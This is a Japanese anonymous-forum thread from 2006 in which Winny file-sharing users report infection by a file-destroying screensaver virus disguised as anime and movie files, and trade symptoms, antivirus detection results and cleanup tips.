悲惨な状況ですが、光が差してきました!
292:名無しさん
06/11/25 19:42:22 oXbkAWJo
武装錬金第8話寄宿舎の夜の.scrにて引っ掛かった
真赤な誓いにノリつつ開いたのが不味かった
症状はウィルスファイルの入ったフォルダのファイルがbmpに変えられたほか
C:にHARADAOTAKUという名前のフォルダが作られたが中身何も無し、デスクトップ画像も見当たらず
ProgramFilesフォルダを見てみたものの特に変化は見られず。
外付けHDDに入れてたから影響少なかったんかな?
まあ外付けに十把一絡げでコピーしたから気付かなかったわけだがorz
293:名無しさん
06/11/25 19:59:26 VGkfKkFW
なんか症状も様々あるようだね。
ウイルスバスターのオンラインスキャンはまだ反応しない。対応遅すぎ。
294:名無しさん
06/11/25 23:59:40 YheDfEi0
>>292
たぶん同じファイルにやられた。
HARADAOTAKUまでは一緒だが、ProgramFileはexeとかかなり消された。
スキャンしたが特に怪しいファイルとかも見つからなかったのでとりあえずそのまま使ってる。
そのうち暇を見てクリーンインストールする予定。
295:名無しさん
06/11/26 00:37:52 Nd1ir8mx
デスノートのscrで引っかかった・・・orz
朝見てDL完了してたから、「確認確認~」って安易にクリックしてもた・・・。
ウィルスバスター2007では駄目だったね。
C直下に「KANONMATRIX」なるフォルダができてたが、
ウィルスが活動初めてソッコーでタスクを落としたからか、
フォルダの中身は空だった。
とりあえずカスペをインスコして完全スキャン中。
Program Filesの中も、中途半端に消えてるのと消えてないのがある模様。
ちなみに画像は月宮あゆで、「Winnyやめないとファイルを全部けしてあげるよ」的なメッセージが書いてあった希ガス。
296:名無しさん
06/11/26 00:45:04 he/6jaar
俺は>>252と同じHIZACってヤツに引っかかった事がある。
「しまった」と思った瞬間にPC強制終了させたので
同じフォルダ配下のファイルを半分くらいbmp化されただけで済んだ。
最後までほって置いたらどうなってたかは知らないけど。
297:名無しさん
06/11/26 11:23:36 +QKS8c6n
>>296
うちも同様の症状にかかった。ブラックラグーン2で。自分が体調不良のときのミスクリックで発症。
カスペルスキーを4980円で昨日買って別なHDDにインストールしなおしてから、感染したHDDを外付けにしてチェックかけたら
一瞬でそのワームを削除してくれた。
しかし、配下のフォルダ、プログラムファイルズが うぐぅ の.bmpにされてしまった。
別パーティションのドライブは無傷。メーラー入れてる人は他に感染させるおそれ大だから要注意。
うちのは遊びPCでメーラーとかいれてないから助かったが。市販ならカスペ、フリーならAVGでしょうな、こりゃ。
298:名無しさん
06/11/26 11:51:22 O0crYrMW
ワームに感染するのか。
C直下のファイルと実行したSCRファイルを削除しただけで
何も対応してなかったけどAVGインストールしてチェックしてみるか。
299:名無しさん
06/11/26 14:10:35 QnMeKnx3
映画トゥモローワールドでやられますた
他のPCのデスクトップに移動して開いたので
そのデスクトップ上の画像と動画が軒並みBMPに書き換えられたけど
すぐにプロセス止めたので浅い階層のみで済んだのが救いかな。
295と同じで、C直下に"KANONMATRIX"ってフォルダ作られてた
中には"NEO"ってファイル名の自分のデスクトップ画像が1枚・・・
とりあえずフォルダ削除&Prefetchフォルダ内の関連ファイルを削除
再起動してもフォルダは復活してないんで
とりあえずは大丈夫なのかな・・・
300:再インスコ?
06/11/26 17:06:30 EfN+vzkB
映画「フラガール」でやられますた
「まだまだ仁義なき朝比奈みるく」とかです
マイドキュメント内のファイルが軒並みタイヤキの画像ファイルに・・・
AVGでファイヤーウォールの警告が出ました。
すぐに強制終了させましたが、かなりのファイルがとびました。
Winnyの本体プログラムも消されている様子
単純なファイル名偽装トリックだったのに・・・・くやピー!
****.avi + 長ーいスペース + .scr というファイル名
再起動後は正常そうだが・・・ちょっと心配
301:273
06/11/26 17:14:16 rxZdwJIy
BKDR_AGENT.CUN
これに感染してみたいです。
隠しファイルで YA_WMP.EXE というのがあり、
それが作ったファイルはバスターが反応して隔離してました。
mp3ファイルの形をし、開く前のウイルスチェックを潜り抜け、
音楽再生中に発症するなんて・・・恐ろしい・・・
レス頂いた皆様、本当に有難うございました!
後遺症は依然続いており、mp3.exeやavi.exe、wmv.exeとかいう拡張子になった
ファイルが隠しupフォルダ内にあって削除できない状態が続いています。
全てが使用中となっていて削除しようとするとエラーになったしまうんです。
302:名無しさん
06/11/26 17:24:52 7Bf9Mg2M
なんでこんな過疎板にこんなマイナーなウィルスに感染する人がバカバカ現れるんだろうか?
303:阿藤怪 ◆AK4448090.
06/11/26 17:26:43 kX5b9hXY
/ミ ̄' ヽ、
| ノ 二 <(●
| /(● 、>、| この人たちってどっから来るんだろう。
| @ノ -=ヲ ノ
\ヽ__ ,ノ
304:名無しさん
06/11/26 17:33:00 7Bf9Mg2M
感染するとロビーに書き込むウィルスなのかもね
305:まりぃ@ブラッディ ◆JcP82GanDE
06/11/26 17:33:50 NiPuBvm3
逆に、ここにいる人が感染しやすいということは
306:298
06/11/26 17:37:05 zl0znlX+
AVGでチェックしたけど何も問題なかった。
ただlive2chでウイルスコード貼ったレスを読み込んだ時の
datファイルがILoveYouとして引っかかった。
これくらい検出してくれよマカピー・・・。
307:名無しさん
06/11/26 17:42:18 7Bf9Mg2M
我々のレスに全く反応しないあたりホントにウィルスかスクリプトかも
308:みのりかわ糊
06/11/26 17:51:53 LeWhZii6
ノートンってインターネットセキュリティは2005のままで
アンチウイルスだけ2007にするってできるのかな。
309:阿藤怪 ◆AK4448090.
06/11/26 18:05:57 kX5b9hXY
/ミ ̄' ヽ、
| ノ 二 <(●
| /(● 、>、| しかし、ノートン先生はケントデリカットそっくりだな。
| @ノ -=ヲ ノ
\ヽ__ ,ノ
URLリンク(www.kensuke.net)
310:名無しさん
06/11/26 18:07:14 7Bf9Mg2M
ユタはイナカジャナイヨー
311:名無しさん
06/11/26 18:24:46 pv216jQQ
>>301
特定しててこれはやったんかおまい
URLリンク(www.trendmicro.co.jp)
312:名無しさん
06/11/26 20:06:14 8OLtS4g/
自分は>154でやられたもんだけど
ウィルスを開いてしまったら手間隙惜しまず
PCリカバリするのがいい
後々の被害を省みないというならその場しのぎの処置をしてればいいけど
このウィルスは気持ちが緩んだ時にうっかり踏むんだよな
油断禁物思い知ったよ
313:名無しさん
06/11/29 19:05:55 TdB0KQ+A
俺もやられた。
downフォルダがやられたが別にこれはどうでもいいんだが、
program filesフォルダのexeファイルがいくつかやられた感じだな。
exeファイルがフォルダに入って深い階層にあるやつは無事だったが
そうでないのがいくつかやられたか・・・
314:313
06/11/29 20:20:35 TdB0KQ+A
システムの復元してみたが、壊されたプログラムは復元しても
やっぱりどこかおかしくなってる物が多いな。
大人しくクリーンインストかけた方がいいんだろうか?
315:名無しさん
06/11/29 21:00:58 9Kp+MDsJ
「やられる」って具体的にどうなるの?EXEが消される?
俺の場合特に異常は見られないんだが・・・
316:名無しさん
06/11/29 21:08:26 dkBHLT4t
>>314
システム復元はやらないほうがいいよ。
このウイルスはシステム復元用のファイルにコピーを保存するらしいから。
俺はOSの再インストールせずに使ってる。
そのまま使う場合は、いくつかのセキュリティーソフトのオンラインスキャンで全体チェックしたほうがいいよ。
システム復元用のファイルも全部消した。
あと消されたアプリはexeだけの復旧ではなく、再インストールしたほうがいいよ。
317:名無しさん
06/11/29 23:19:32 TdB0KQ+A
>>316
復元やってしまったから取り敢えずノートン先生の体験版落として
スキャンかけてるがlive2chのログのウィルスコードくらいで
特になんか検出はされないよ。
取り敢えず問題のファイルが復活する事もないし何も出てこなければ
それで大丈夫なんだろうか。
まあ、そのうちクリーンインストールかけようと思ってた所だから
クリーンはかけるけど。
ウィルスバスター持ってたから一応開く前にスキャンかけたのに
何も検出しないし使えないなぁ。
318:名無しさん
06/11/29 23:36:09 dkBHLT4t
>>317
俺もバスターが反応しなかったので、そのまま実行してしまった。
もうバスターは使えないと思ったね。
他のセキュリティーソフトに変更する予定。
319:313
06/11/29 23:38:05 TdB0KQ+A
>>315
後、俺の場合新種なのかわからんけど、exeだけじゃなくフォルダの
中のファイルは全部やられたよ。
話を見てるとProgram filesに置いてあるフォルダの
exeファイルだけやられてってあったけど、exeだけじゃなくて
フォルダの中身が全部消えてた。
ちなみに>>296や>>252と同じHIZACってのがCに作られてたけど
見たときはファイルは何も無かった。
取り敢えずこのフォルダは消しといたけど。
320:名無しさん
06/11/30 03:54:27 jzsL2pZc
exeは消されるだけじゃなく、消されたdownフォルダ内のファイル名で
上書きされてるのもあった。
Application Data内のファイルにも影響があるぽい。
あとパーテーションで区切ってたり、物理的に別ドライブであっても
nyフォルダ下のdownフォルダは狙い撃ちされるみたい。
亜種がいろいろあるみたいで一概に言えんかもしれんが、
プロセス止めるまでのタイミングで被害に差はありそう。
321:名無しさん
06/11/30 12:36:16 cwwlc0wI
プログラムファイルとかアプリにまで食らったら
おとなしく再インストした方が良さそうかも。
中途半端に壊されるから上書きしても少しおかしかったりするし、
後々のことも考えると。
俺もバスターだったが使えないな、こいつ。
ファイアウォールもアップを防いだのかよくわからないし。
322:名無しさん
06/11/30 19:27:40 cwwlc0wI
やばいのは問題のファイルとCドライブに作られるフォルダと
復元のコピーのみ?
こいつを何とかしておけばレジストリとかどっかに感染は
ないみたいだから取り敢えずは使ってても
問題無いのかな。
なんか亜種が山程あったりウィルス対策ソフトで
スキャンしても引っ掛からなかったりよくわからん。
323:肉茎平均
06/11/30 19:41:48 ShZ4Y7bP
winnyって怖いね
やらないほうがいいね
324:名無しさん
06/11/30 20:16:16 dx1I9YBJ
この人達はどこから来るの?
325:肉茎平均
06/11/30 20:22:51 ShZ4Y7bP
ロビーの人じゃないことは確かだね。
てか、多くて2人くらいで書いてるんじゃないの?
326:名無しさん
06/11/30 20:27:08 dx1I9YBJ
二人だけで300レス以上回してんの?
なんの目的があって?
327:名無しさん
06/11/30 20:28:19 Do+1xoB0
え?別に迷惑かかってないんだからいいじゃん。
328:肉茎平均
06/11/30 20:29:47 ShZ4Y7bP
いや、目的はわからないけどそんなに多くのロビラーがいきなり急にwinnyのウィルスに
こんなに関心持つとは思いづらいし
329:名無しさん
06/11/30 20:36:07 yLY3Cisk
ウイルス情報求めて
スレッド検索から来てるんじゃないのかな
330:名無しさん
06/11/30 20:44:07 LCjTFIhq
こっちに誘導された
331:名無しさん
06/12/01 03:04:15 Zkp83+Dp
>>329
正解
332:名無しさん
06/12/01 03:45:13 CtfcRtpb
初めて見たときは「何このアイコンwwスクリーンセイバーって書いてるだろww」
と思ってさっさと消したのに今日は何故か疑いもせず踏んでしまった('A`)
何やってんだ俺
また落とし直しか…
333:名無しさん
06/12/01 10:31:12 O07eX/Zl
たこさんウィンナーでやられた・・・。
なんか怪しいな、っていうのは思ったんだけど
デスノ見たさに思わずクリック。
ちなみに私は、『ウィルス たこさんウィンナー』でググって
こちらに辿り着きましたよ
334:名無しさん
06/12/01 13:43:11 PJPPvnx5
「コードギアス8話」で感染してしまった…。
再起動とか終了して立ち上げると履歴やらデスクトップが一掃されるんだが。
ちなみにexeもいくつか消された。
それ以外は結構マトモに動くんだが、スキャンしても引っかからないし…。
やっぱOS再インストするしかないのかなぁ…。
335:名無しさん
06/12/01 14:31:22 c0Ql3ACR
べつに、プロセスで何もウイルスらしきものが動いてなくて
レジストリも正常で何の問題もなくOSも全てのアプリも使えているなら
再インストとかクリーンインストとか必要ないやん。
やったほうがスッキリするだろうけど、面倒やん。
336:334
06/12/01 15:52:35 PJPPvnx5
まぁ、確かにそうなんだが、お気に入りとか毎回消されるのは困る。
デスクトップに置いたファイルは毎回ゴミ箱以外消されるし。
アプリは再ダウンロードすれば問題ないんだけど。
再インスト以外の解決法知ってる人いたら教えてくれると有難いな。
337:名無しさん
06/12/01 16:28:47 AjIAwmw5
>気に入りとか毎回消されるのは困る。
>デスクトップに置いたファイルは毎回ゴミ箱以外消されるし
あんたそれ、正常な状態じゃないっすよ。。
再起動してもそうなるんだったら明らかにレジストリが
書き換えられているし、ウイルスも毎回起動しているはず。。
338:名無しさん
06/12/01 16:58:00 Lk4HNxkS
>>336
スタート→「ファイル名を指定して実行」から「msconfig」と入力して実行する。
システム構成ユーティリティが起動するから、スタートアップタブを開く。
その中に覚えのないプログラムが登録されてないかい?
339:名無しさん
06/12/01 17:03:26 N3eckqRo
アンチウィルスソフト各メーカーに告ぐ
「 W i n n y を 封 鎖 せ よ !」
「 う ぐ ぅ ウ ィ ル ス は ス ル ー し ろ っ !」
340:名無しさん
06/12/01 18:38:32 JxCvDGr6
テキストのアイコンをした「ファイルの再生方法」とかかれたscrファイルを不用意にもダブルクリックしてしまいました。
すると突然PCが終了されてしまいました。
その後、winnyのアップフォルダのチェックもし、PC全体にウイルスチェックをしても何も見つからないのがかえって不気味です。
一応システムの復元もしましたが、今後どのように対処したらいいのでしょうか?
341:名無しさん
06/12/01 18:44:39 /CsbOlQ8
実際そんな風潮だなぁ。
発見から結構経つのに全く対策取ってないとこ多いし。
nyでやられたのなら自分にも非があるが、普通にどっかでアップされてるのを
落とした人は哀れだ。
知らないなら引っ掛かりやすいし、スキャンしても何も出てこないんだし。
342:名無しさん
06/12/01 19:50:02 lmb5Q3w6
スキャンしても何も出ないからどこまで安全かわからんのが怖いな。
再起動して問題の物を削除すれば大丈夫かと思いきや>>334みたいな例もあるし。
大人しく再インストしとくか・・・
343:名無しさん
06/12/01 20:28:09 +dMtUPGV
君ら、アンチウィルスは入れてないのか
344:コウモリ駅長 ◆LpppppNqDQ
06/12/01 20:44:30 8vlgiPhs
winnyなんか使うか?
345:名無しさん
06/12/01 21:21:43 CtfcRtpb
アンチウイルスソフトとか関係無いからな、コレはw
ファイルの種類が「スクリーンセーバー」って書いてるのに先走って踏んでしまった
落とした側の責任だ。
数百GBトンだがいい薬になった。これからはもっと気をつけないとな
346:名無しさん
06/12/01 21:39:36 4qcMP7oP
最近になって急にウイルス被害者が増えたな。
ウイルス自体は単純なものでしかないんだけど
少し前のやり方よりも踏ませ方が上手くなったと思う。
347:334
06/12/01 22:14:34 PJPPvnx5
>>337
やっぱりおかしいよな…。
再起動してパスワード入力してからデスクトップになるまで凄い時間が掛かってたのは書き換えられてたからなのか…。
>>338
パソ初心者だから正直よく分からなくて申し訳ない…。
覚えのないプログラムというか、どれが必要なプログラムかすら分からない・・。
何かWINDWSファイルのなかのPrefetchというファイルを見つけたんだが、中身が全部「不明なアプリケーション」なんだが、これは何なんだ…。
それにしても、ここのスレの住人は皆優しいな。
348:名無しさん
06/12/01 22:57:35 LRSLsdp7
プログラムファイルのデータを飛ばされたせいかわからんが
踏んでからどう見ても色々と不安定だから結局再インストする事にした。
今までは動画はそんなに危険じゃないと思ってたからいい薬になったよ・・・
349:名無しさん
06/12/01 23:04:50 LRSLsdp7
>>347
ノートンの体験版かオンラインスキャンでもしてみたらどうだ?
既に持ってたら悪いがノートンなら少しは反応するからなんか出るかも。
350:名無しさん
06/12/01 23:23:56 Xxd/eTSC
>>347
URLリンク(www.tef-room.net)
パーティションで分けてるなら
必要なデータだけを別ドライブに移して
再インストールした方が早いよ。
351:肉茎平均
06/12/02 00:15:01 mmkdPIPG
プロバイダからメール来た人いないの?
352:名無しさん
06/12/02 04:01:30 UtcPtCT1
自分もあっさり感染してしまったので、C下に作られたフォルダと元ファイルはきっちり削除したんだのですが
システムの復元ファイルにだけアクセスできずじまいでした。
ちゃんと復元ポイントのファイルはすべて無効にして削除したのですが…。
アクセスできないものは仕方ないのでシステムの復元にだけ気をつけて今度生活していけば良いですよね?
353:名無しさん
06/12/02 07:06:45 7YZq/eDQ
>>352
URLリンク(support.microsoft.com)
俺は復元を無効にしても消えなかったので、手動で消した。
あと、セキュリティーソフトによっては、このウイルスを検出できないので、
検出できるセキュリティーソフトを入れておいたほうが良い。>>262
すぐ導入できなければ、セキュリティーソフトメーカーのオンラインスキャンで、
一度全てのファイルをウイルスチェックをしたほうが良い。
ノートン
URLリンク(www.symantec.com)
カスペ
URLリンク(www.kaspersky.co.jp)
F-Secure
URLリンク(www.f-secure.co.jp)
354:名無しさん
06/12/02 07:30:21 F4YyL+wq
途中でプロセス終了せずに
最後まで実行しきった人っているの?
自分は気づいてすぐにPCを再起動したので
同一フォルダファイルのbmp化とC直下にデスクトップ画像作成だけで済んだようだが
最後まで実行するとどうなるのか気になる。
355:名無しさん
06/12/02 07:46:38 7YZq/eDQ
俺も途中でタスクマネージャから強制終了させた。
bmp化、SS作成、Program Filesのファイル削除だけ確認できた。
bmp化の途中で止まったようだ。
>>92にあるようなftpでファイル転送という動作は確認できなかった。
356:334
06/12/02 09:08:45 1//v07RD
>>349
ノートンやってみた。
前オンラインスキャンで検出されなかったから(ノートンじゃないが)、体験版でやってみた。
検出されたっぽいから対応するみたいなのやったら直ったっぽいよ。
ありがとう。
>>350
情報ありがとう。
Prefetchファイルはウイルスが入ったりすることもあるっぽいから一応削除してみた。
再起動したときにはまた構築されてたから消しても大丈夫っぽいな。
一応ノートン+Prefetchファイル削除で直ったっぽい。
ちゃんとデスクトップもそのままだったし。
まだ様子見てみないとわからんが…また相談しにくるかもしれん…。
ご迷惑おかけしました。ありがとう。
もうWinnyには懲りたよ。
これからは気をつけないとな…。
357:名無しさん
06/12/02 21:43:39 f7q2MUwc
最近はnyより洒落のが情報流出とかの方の被害は多いらしいけど、まだまだnyも怖いな
358:名無しさん
06/12/02 22:30:57 7oQkwKCX
デスノート9話「接触」.srcにかかったので記念パピコ
ダウンフォルダの中身のみ消されてbmpが残り(ダウンフォルダ下のフォルダ内ファイルは無事)
C直下にうぐうフォルダ作成されてた。
復元ポイントは作られてなかったのでとりあえず安心。(念のためシステムは前日のものに復元
今は上記のファイルを削除して様子見してる。一応プロセスでは変なの動いてないかな。
なんか変化があったらまた報告します
359:名無しさん
06/12/02 23:21:23 z7OtWFYk
相当亜種あるのか。
報告された被害内容や作られるフォルダ名とかどれも微妙に違うし。
360:肉茎平均
06/12/02 23:30:00 mmkdPIPG
誰かPD使ってる人いる?
361:名無しさん
06/12/03 00:52:59 NWrWge1O
PDってなに?
362:肉茎平均
06/12/03 13:27:10 y6x4fw7S
Perfect Dark
363:名無しさん
06/12/03 14:02:38 UzPUgH4l
>>340と同じ手口に引っ掛かりましたよorz
おとなしくOS再インスコが最適な処理でしょうか…。
どなたか助言願いますm(_ _)m
364:名無しさん
06/12/03 14:08:30 NWrWge1O
Perfect Dark って360のゲーム?
365:名無しさん
06/12/03 16:07:33 VC9MD6y/
>>363
心配だったら再インスコ
表面上何もなくて気にならないならそのまま使えばよし
全ては自己責任で判断どうぞ
366:名無しさん
06/12/03 20:56:58 /GdUCLPp
プログラムファイルの影響が軽微ならそのまま使ってもいいけど、
ある程度ダメージがあるんなら再インスコがおすすめだがな
367:名無しさん
06/12/03 23:03:27 5VCFlYHx
デスノ10話目でやられた。
Cドラのプログラムも幾つか消されてるし。
再インストしまーす。
バスター、反応しなかったわ。
368:名無しさん
06/12/03 23:15:00 0tW6NSUN
これから感染報告時には何の画像が表示されたかとかも書いてほすぃ...www
369:名無しさん
06/12/03 23:19:51 kxZGAU8M
今のところ検出できるのは
ノートン、カスペ、AVG、a2
検出できないのは
バスター、マカフィ、avast!、AntiVir
他にも確認できたのがあれば追加よろ。
370:名無しさん
06/12/04 08:28:16 9VCS7/Tz
>>363
自分も引っかかった_| ̄|○
ただ、Cドライブプログラムは全く変化なしだし
upフォルダもいかれてない。
人柱となり様子見ます。
371:368
06/12/04 11:23:05 6r+x3nm9
アニメにそこまで詳しくないので、
アニメの種類はわからないけれど、女の子の絵だった。
文章は覚えてる部分を羅列するけど
『まだ P2Pなんて 0.5秒で切らないと ブっ殺しますよ』
という単語が含まれてたはず。0.5秒ってのは確実。
372:名無しさん
06/12/04 11:23:52 6r+x3nm9
↑
367ね。間違ったw
373:名無しさん
06/12/04 11:40:40 zGya7Xb9
今のとこ報告のある画像で多いのは
カノン(タイヤキ、ウィンナー)ハルヒ(長門)
少なくとも画像の種類だけ亜種があるってことか
374:名無しさん
06/12/04 14:16:14 +XQbmnG+
>>373長門さんって多いのか??
375:名無しさん
06/12/04 21:43:22 Aev1qQ91
>>371
エルルウが「そろそろnyやめないとぶち殺しますよ、、、」って笑顔で言ってるやつがあったからそれの仲間かな?
376:名無しさん
06/12/04 21:48:51 ZQU6ZvdX
>>371の絵の女の子ってもしやネコ耳生えてなかったか?
377:名無しさん
06/12/04 21:58:12 LQh9uhog
抽出してみた
URLリンク(vista.jeez.jp)
URLリンク(vista.jeez.jp)
378:367
06/12/05 15:07:35 3YmbucrG
いや、ネコ耳とかじゃなく普通の人間の女。
髪は薄い青で、画像の質的に少し古そうな
アニメだったけど・・・。
髪型はロングで、服装は学生っぽい。
目が『^^』こんな感じ。
nyという単語は出てなかった。
379:名無しさん
06/12/05 15:50:46 07HPxnCn
>髪型はロングで、服装は学生っぽい。
マジか?これ学生と見なせるという目が信じられんwww
380:nu- IE版 ◆Ujnu.4men.
06/12/05 16:26:36 pt4jr2j+
>>379
なんだったの?
ていうかあれだな
ウイルス作者は今後コピーライト入れといてくれ
著作権的にも☆ね
381:名無しさん
06/12/06 17:31:57 EhVjdpnY
デスノ10話でやられた('A`;;;;;;;;;;)
デスノ用チェックで^^^^^^^^^^^^^^^
382:名無しさん
06/12/07 01:32:54 COT8FnzD
(アニメ) デスノート DEATH NOTE 第10話 「疑惑」 (日本テレビ 704x396 DivX640 QB97%).avi(スペース数十個).SCR
237,086,208 46b8b086668a767ec7c06bc12b30a11b
これかな?
俺も引っ掛かって色々検索してたらこのスレにたどり着いた。
ファイル消去は今のところ確認できないが、CドライブにUGUUフォルダが出来ていて実行したときのSSがbmpファイルで入っていた。
実行時に画面に何かが出たりはしなかった。
バスターで全ファイルを調べたが、ウイルスは検出されなかった。
しばらく様子を見ようと思う。
383:名無しさん
06/12/07 01:37:40 COT8FnzD
>>377はこれだな
URLリンク(www.utaware.net)
384:名無しさん
06/12/07 04:18:42 1iaNiVlH
くそっ
そろそろ寝ようかってときに引っかかっちまった
武装錬金の9話
カノンの栞が出てきた気がする。
エロ動画ばっかりとかなんとかメッセージがあった
385:名無しさん
06/12/07 17:00:03 zZWYkUdV
一応、ウイルスに引っかかった人は、
スタートメニュー→ファイル名を指定して実行→msconfig→スタートアップタブ
で、OSが起動するたびに動いているプログラムをチェックしておくことを
お勧めするよ。
レジストリエディタで見るより分かりやすい。OSによってはmsconfigでは
ない場合もあるかも。
386:名無しさん
06/12/08 23:49:51 5Y2p172B
わかんないけど
オリジナルのアイコンに変えとくとかの対策は意味ないの?
387:名無しさん
06/12/09 05:24:39 2yoqTGHy
>>386
それは有効らしい
388:名無しさん
06/12/09 06:16:59 ZalApD6x
俺、変えてたけど踏んだ。
バスターを信用していた俺がバカだった。
389:334
06/12/10 16:35:31 UvzGbDQ1
昔デスクトップがおかしくなったと書き込んだ334です。
ノートンで解決したと思ったが、そうでもなかったっぽい。
ローカルディスクいじってたらDocuments and Settingsファイルに新たにAdministrator.LATITUDE-D500ファイルが出来ていた。
どうやら新しいユーザーが勝手に作られてたってことなんだろうか。
現在起動すると普通にAdministrator.LATITUDE-D500というユーザーになってしまってるみたいなんだが、誰か解決法あったら教えてやってください。
何度も何度も申し訳ない…。
390:名無しさん
06/12/10 17:12:47 m0nZ8WFm
>>389
さっさと再インストしておけば
今頃は普通にPC使えてたのに
391:名無しさん
06/12/10 18:37:44 yFTgyHXH
>>389
勝手に作られて無いとオモ
392:334
06/12/10 21:11:30 UvzGbDQ1
>>390
いや、パソコンを普通に使う分には問題ないんだが、ちょっと気になったんで。
やっぱ再インストするしかないか…?
>>391
ちょっと意味がわからないので詳しく教えてくれませんか…?
393:名無しさん
06/12/10 21:14:36 Ksd5K8A6
>>340
私も同じくテキストのアイコンをした「ファイルの再生方法」とかかれたscrファイルをダブルクリックしてしまいました。
するとメディアプレイヤーが立ち上がり突然PCが再起動されてしまいました。
再起動後、またすぐにメディアプレイヤーが立ち上がり再起動・・。
ウイルスバスターも反応せず。
一体どうすればいいのでしょうか。
394:名無しさん
06/12/10 21:46:04 yFTgyHXH
>>392
DELL社製のLatitude D500使ってね?
DELLの人がXPインスコした時に作成したものだとオモ
395:名無しさん
06/12/11 00:29:24 XDn90K8P
ウイルス感染後にMSNメッセを起動したら、修復中とかいうメッセージが出た。
そのときは、あまり気にしていなかったが、数時間PCを放置したあと戻ったらメッセのアイコンが
別のものに勝手に変更されていた。やばいと思ったから再インストールした。
396:名無しさん
06/12/11 01:50:24 TB2ZHclH
>>393
俺も同じ症状です。
メディアプレイヤーは閉じるを押したら消えるので強制終了は回避できるが…
毎回起動するのは変わりませんな。
そのウィルスクリックしたときコマンドプロンプト起動しなかった?
397:名無しさん
06/12/11 07:04:02 vjp4PEgu
>>393>>396
1
WINDOWSフォルダ内にあるfromJASRAC.midを消す
2
レジストリ エディタを起動して
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
にあるfromJASRACを右クリックして削除する。
これでおk
398:334
06/12/11 08:24:00 gkG31qdA
>>394
そうなのか…。
でもAdministratorファイルも別にあるのはどういうことなんでしょう…。
399:名無しさん
06/12/11 19:28:18 C3a3+ggQ
>>398
複数あるは怪しすぎ
素直にリカバリした方が良い
400:名無しさん
06/12/11 22:51:02 TB2ZHclH
>>397
サンクス!
401:まりぃ@ブラッディ ◆JcP82GanDE
06/12/11 22:52:27 HiFanjxa
サークルK
402:名無しさん
06/12/12 23:53:08 BSzNhMwf
ugu-virus-ver4ってのに感染した。
exeファイル消去されてアプリケーションみんなやられた。
リカバリするしかないのかな?
ワクチンは出てないよね…。
403:肉茎平均
06/12/13 10:46:07 /PR+nCop
金子氏有罪かぁ
まあ、想定内だけどな
404:名無しさん
06/12/14 18:27:39 13gtVWOj
油断しててやっちまったぜ。
「あら、まだP2P起動るわねw 今から0.5秒以内に止めないとぶち殺しますわよ...。」
こんなのに引っかかった。
Down直下とProgram Filesの一部が消えた。シャットダウンしたからこれだけで済んだのかも。
バスターじゃ反応しないとの事だったので、NortonAntiVirus2006に変えてスキャン。何も検出しませんでした。
405:名無しさん
06/12/14 18:30:52 13gtVWOj
あ、あとC直下にUGXDってフォルダができた。
中身は何もなし。
どっかにFTPつないでなんか送ってるのかな?
406:名無しさん
06/12/14 18:47:24 4Lohayxm
シャットダウンしてなかったらUGXDフォルダに何かのファイルを作られていたかもしれないな
407:名無しさん
06/12/14 18:48:43 13gtVWOj
>>406
そうだねえ。たぶん。
とりあえず20番と21番のポート塞いでみた。
408:名無しさん
06/12/14 21:12:47 13gtVWOj
ためしに再度DLしたらTrojan.Haradongとして検出されました。
409:名無しさん
06/12/14 22:24:20 DWfp0AYe
URLリンク(vista.jeez.jp)
この画像かな
410:名無しさん
06/12/14 22:26:13 13gtVWOj
>>409
そそ。それそれ。